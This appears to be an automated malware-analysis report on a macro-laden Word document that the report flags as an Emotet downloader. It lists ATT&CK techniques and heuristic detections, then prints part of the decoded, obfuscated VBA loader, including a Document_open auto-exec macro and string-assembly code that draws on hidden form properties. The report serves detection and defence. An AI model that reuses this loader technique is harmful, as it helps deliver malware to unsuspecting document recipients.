Verdict: MALICIOUS
Risk Score: 302

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1140 Deobfuscate or Obfuscate
- T1071.001 Web Protocols

Malware Insights
The sample contains VBA macros, including a Document_Open macro and a hidden-property command stager, which are indicative of Emotet's typical behavior. The heuristics suggest the macro is designed to download and execute a second-stage payload. ClamAV also identifies the file as Emotet. The obfuscated nature of the VBA code, using split/join and variable reads, points to an attempt to deobfuscate and execute malicious code.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-7464371-0 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7464371-0
- VBA macros detected (medium; OLE_VBA_MACROS; 5 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical; OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high; OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high; OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high; OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7885 bytes |

SHA-256 of macros.bas: 21cc29f0de2466284c9128418972570ac2340020e21b245e52b669fc17a08b6e
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Babbqmlcj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Cmikwaluujqn, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Kthhfohlzqdrn, Zlwsdiorbr
For Zcurqqmkrmj = Jfctszscdefbb To Vbfpdxhifzm
Hsmblwud = Isjowxopooxpp
Hybwwtgxsvls = Hex(Fgmjdwxtjll)
Xmdrcfhexs = Chr(Ecurskfkajh)
Lkwnpplfk = Odimxlhoet - Ccqafhjoesmr
Qicvkttjco = Mobtfmlpulyp
Bugvrrqmuzlji = Hex(Tzcymuum)
Zffqfknqms = Int(Hxkcauci)
Next
Dim Zqrqtwqmoicf, Wmzesnfklywll
For Updayskts = Cggerbte To Nxrwppftth
Fusyfcelt = Rkydhgvsghw
Mdjdeazgqxbm = Hex(Wqarrhgamqly)
Odxiozmbsahth = Chr(Mwrvozcg)
Ymmrsrgna = Ztxmguxakyz - Zutdyymxhcpnz
Iafgsnndtihee = Hypmsyxcp
Prqhyglxr = Hex(Temlrauquisc)
Ynrbkypemyv = Int(Jatgovofla)
Next
Dim Mimsbias, Xuuztqdthotha
For Vaqgooyypzh = Vagcxipkthp To Bedjfiidfik
Jyvezlzmx = Rjroecsbt
Uvguzinpsw = Hex(Zrppidnedxv)
Rtydpitjxeaxe = Chr(Yholatrxpmky)
Ixaoyhppmdow = Nosdqvfv - Rczvjqfknp
Zigfcjvlw = Qjaughkomo
Whtgwxdjsngoj = Hex(Twaynnqjmi)
Ddabsjljxjdyn = Int(Tcdmljvqrmqd)
Next
Dnrpxhnpigyiz
End Sub
Attribute VB_Name = "Gpohsrakivot"
Attribute VB_Base = "0{CB1AFFFE-DD07-4103-ADDB-9C1DA6F10761}{F7A96450-1BAC-492B-9A79-5CD49B7694EA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Nyunlmwq"
Function Yslysiwbq()
Dim Tpwszfkexwj, Ddgdattue
For Nsxkgijmmbe = Rsoyrnbnmifk To Zlcvphgehhay
Xkfyrllhevc = Dbjszhpja
Pfonkhxtz = Hex(Bcgtmhrhhsz)
Dxpbqzdw = Chr(Jlxyxxxjqrnzh)
Vistcnpdl = Swcalsadxh - Ujjjijpdqd
Qkdyltilokfbg = Uydoxfzyj
Huvgwoagj = Hex(Csezdukeicr)
Enoxqrmuggln = Int(Oqaahfewk)
Next
Pyqoaqkph = Babbqmlcj.Cmikwaluujqn
Dim Sufhidnnau, Wfqdimyvtildd
For Uwslbsohkobl = Pbjhhccgl To Scsjjbehlsqh
Fhxfpgbuo = Bvvypoles
Wxamxeroyta = Hex(Ueavhsxo)
Ifijwefd = Chr(Olafcjxczfoat)
Loqwakci = Houvktpjfnje - Yuuoiohmpflq
Qllcenvuc = Myqngthtxyf
Ahkvzpkteit = Hex(Gzhxesnz)
Ryjmexrilvx = Int(Czunxvipxtemh)
Next
Wxnolvnz = Pyqoaqkph + Gpohsrakivot.Ckthgdwwsbeb + Gpohsrakivot.Laqsmtwrvgn + Gpohsrakivot.Rvyvcuib
Dim Vyesjekdq, Pergxfojl
For Hozffpgak = Elngzhugj To Eggrywchljop
Seyvwqfvhag = Fgoehsoktzo
Ydyypvwrhd = Hex(Mxniyflfgw)
Egwdfzfkemrcx = Chr(Kxzydstvva)
Tdldbdbtiysm = Lgzfkkptahgyw - Lbccelhtjq
Pdlenpfhnvqpr = Cdwcgwjw
Jdmemqoloaq = Hex(Tirxwqkn)
Kepmntzg = Int(Odmscbfbede)
Next
Apxdfxefhgcwh = Wxnolvnz + Gpohsrakivot.Xvdyrplk + Gpohsrakivot.Pvjgydaafuu
Dim Mjqrjhxtla, Uwptcfxrq
For Vvguyakqngf = Pzlwwwvad To Kxuyebms
Uwcmztbjrxpk = Ctauuhosr
Aflmltmcku = Hex(Jxcuqlfkz)
Vlasycgbewc = Chr(Pxfedizjzkr)
Mxglwlnppbkb = Esymhzoetgbhq - Wajuhpivt
Kyzwvcpiurb = Xcheajouai
Bggkvxfl = Hex(Pfwlzshspvb)
Eheujlwjqgvuv = Int(Ztvmuimchpkwm)
Next
Yslysiwbq = Fceoxxobnri + Apxdfxefhgcwh + Fceoxxobnri
Dim Bqfrcgnxk, Qvymrccrajoaa
For Qdtykrkfw = Fhdqfewcaioz To Zmkwmpfcupjem
Fpchzwuoj = Eyozcegake
Kpmdnngbsw = Hex(Slrnaexasblh)
Mfxlozfgssmt = Chr(Dbshatgq)
Zghzqidfptaa = Hxpmtzbhy - Rjegtnwtflisf
Ohdnacxlac = Xmrshkbzzzyw
Hyuyfkwj = Hex(Dkwvtxdeptzg)
Aidrkoihiwvz = Int(Xtxnbyox)
Next
End Function
Function Dnrpxhnpigyiz()
Dim Frzmzbrgy, Siydzxcrwpgz
For Uhzmuxukm = Tddudyjinxqh To Axkqszrt
Trudaxi
... (truncated)
```